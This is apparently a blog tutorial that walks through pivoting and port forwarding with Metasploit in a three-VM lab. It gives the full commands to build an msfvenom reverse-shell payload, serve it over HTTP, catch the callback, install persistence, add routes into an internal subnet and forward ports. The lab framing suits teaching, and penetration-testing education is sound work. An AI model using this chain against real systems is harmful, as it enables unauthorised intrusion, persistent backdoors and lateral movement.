PIVOTING & PORT FORWADING
Pivoting a technique used by metasploit to access internal machines in a network that we cannot access from the Outside.
In this post, I will be using 3 machines to demonstrate how this is done.
- Kali Linux(attacking machine) — In the same subnet with Windows 7 only.
- Windows 7— In the same subnet with Kali and Metasploitable 2.
- Metasploitable 2 — In the same subnet with Windows 10 only.
Now I think basic Networking tells us that when two machines are in the same subnet, they can communicate. Since the Kali and Metasploitable 2 machine are in different subnets, they can’t communicate. Meaning, it’s not possible for the Kali network to directly scan and enumerate the Met2 machine(locally).
It’s actually possible if the Kali machine knows the public ip of the Metasploitable 2 machine and we begin our attack by targeting the public ip But over here we are working locally.
How is it possible that one machine can be in two different subnets at a time?
Ans: Because that machine has 2 different network adapters. So each adapter is configured to a different Class of ip address.
So the Windows 7 has two network adapters. One(10.60.32.157) which communicates with class A IPv4 addresses and one(192.168.56.5) that communicates withthe class C IPv4 addresses.
Let’s take a look at our Virtual Machines.
Below is the Kali Linux with an ip of 10.60.32.82.
This is the Metasploitables 2 machine with an ip of 192.168.56.7 (different class from that of the Kali). Meaning the Kali can’t communicate directly with it.
And this is the windows 7 machine with two network adapters. One which gives it a 192.168.56.5 ip to communicate with the Metasploitable 2 machine and one which gives it a 10.60.32.157 ip to communicate with the Kali Linux machine.
Scenario:
You’re an attacker in a black box environment, your target was initially the windows 7 machine. Now as usual, you began with a scan, with hopes of finding a vulnerable service running on the target, maybe you find an exploit for that vuln. You gained an initial foothold on the system, now you look for Privilege Escalation vectors and BAM! you’ve owned the system. Easy right?
Now let’s try that.
Let’s nmap the windows 7 target.
sudo nmap -A -p- -T4 <windows7 ip>
As shown above, its obvious the Windows 7 machine has nothing to go on about aside the SSH running on it. If we knew the password to the SSH service, that would have been sweet, but in this case we don’t, so let’s try another approach.
There are other methods used to gain access to a windows machine. Here I’m going to go with the Payload method.
Let’s begin by creating our payload with msfvenom.
The syntax goes like this:
msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<local ip> LPORT=<local port> -o payload.exe
where LHOST is the ip of the attacker macine and LPORT is the listening port on the attacker machine.
Now the payload has been created as windows binary. Let’s set up our listener which will be waiting for a connection from our payload.exe the moment it’s executed on the windows 7 machine.
I will be using metasploit’s multi handler to set up the listener. Launch metasploit with command:
msfconsole
now use multi handler as the listener with command
use multi/handler
set the payload type to the same one you used during the creation of payload.exe
set payload windows/meterpreter/reverse_tcp
Now check the options you have to set with:
show options
set the Listening host to the attacker’s ip.
set LHOST <Kali Linux ip>
set the LPORT to the port specified during the payload creation.
set LPORT <payload port>
now to start the listener, type:
run
Now the attacker machine is listening for connections from our payload.exe
Now let’s find a way to get it unto the window 7 machine. What about hosting it on a server and getting the windows user to download it?
In the same directory where the payload is, let’s start a simple python HTTP server which will host the payload.exe.
python -m SimpleHTTPServer
Now the server is running on port 8000 on the attacker’s local machine.
Now open any browser on your Windows 7 machine and type into the address bar:
http://<attacker's ip>:8000/payload.exe
Now save it and go to your Downloads folder, the downloaded payload.exe should be there.
Now open the payload on the windows 7 machine.
Now check the listener on the attacking machine, you’ll see a connection was sent back to it.
Now you get a meterpreter shell. Background that shell with bg. Install a persistence script on the target machine so that in case our meterpreter session dies, we can always spawn a new one.
search for the persistence post-exploit module
search persistence
use it with:
use exploit/windows/local/persistence
look at the options to set with:
show options
Now set the session to our background’d session ID (which is 1)
set session 1
set the LPORT to another random port
set LPORT 1234
now run it to install a persistent vb script on the target.
run
Illustrated below:
After a successful run, you’ll see this:
now move into the session we background’d with:
session 1
switch from a meterpreter shell to a cmd shell with command:
shell
Now type ipconfig to check out the network interfaces of Windows 7
As you can see above, there are two network interfaces, one which we already knew (10.60.32.157) and a different one we had no idea about.
Let’s add that network range to our route list so that our attacker machine can communicate to it.
run autoroute -s 192.168.56.0/24
Now check all your added routes(you can add more) with:
run autoroute -p
Now that we have added that network range to our route list, why don’t we scan that entire subnet to see the active devices on that machine. Let’s use Nmap.
After scanning, it became evident that there’s another machine on that network(192.168.56.7) aside the windows 7 (192.168.56.5) and it had some juicy ports running on it.
PORTFORWARDING
Portforwarding allows us to set up a port on our local machine which we can use to access a remote service on our target.
It has an HTTP server running at port 80. Now let’s portforward that to a local port(8181) on the attacker machine so that we can access it.
In a meterpreter shell, access the help page of the port forward command with:
portfwd -h
Following the syntax from the help above, we can port forward the port 80 to a local port(3232) on the attacker machine with the command:
portfwd add -l <local port> -p <remote port on targets machine> -r <target ip>
NB: Over here the target isn’t the Windows 7 anymore but the Metasploitable 2 machine.
Now that we have successfully port forwarded the web server on the Met2 machine to our local system, let’s try access it in a browser on the attacker machine.
You can google DVWA default credentials and try the on this portal.
If I made any mistake anywhere, you can send me a DM on Twitter @tinopreter or on LinkedIn @ClementOseiSomuah